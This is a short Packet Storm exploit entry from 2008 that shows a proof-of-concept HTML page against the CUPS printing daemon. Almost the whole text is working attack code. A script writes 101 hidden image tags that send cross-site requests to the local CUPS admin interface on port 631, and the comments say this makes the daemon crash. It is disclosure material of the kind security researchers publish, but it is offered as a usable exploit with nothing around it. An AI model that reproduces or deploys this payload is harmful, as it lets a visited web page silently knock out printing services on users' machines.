cups-dos.txt

2008-11-19T00:00:00
ID PACKETSTORM:72064
Type packetstorm
Reporter Adrian Pastor
Modified 2008-11-19T00:00:00

Description

                                        
                                            `<!-- cat cups_dos_poc.html -->  
<script>  
// make 101 CSRFed requests to CUPS daemon via 'img' tags  
// causes CUPS daemon to crash  
// by Adrian 'pagvac' Pastor | GNUCITIZEN.org  
  
for(var i=1;i<=101;++i) {  
document.write("<img width=0 height=0 " +  
"src=\"http://localhost:631/admin/?OP=add-rss-subscription&SUBSCRIPTION_NAME=DOS_TEST_" +  
i + "&PRINTER_URI=%23ALL%23&EVENT_JOB_CREATED=on&MAX_EVENTS=20\">");  
}  
</script>  
  
`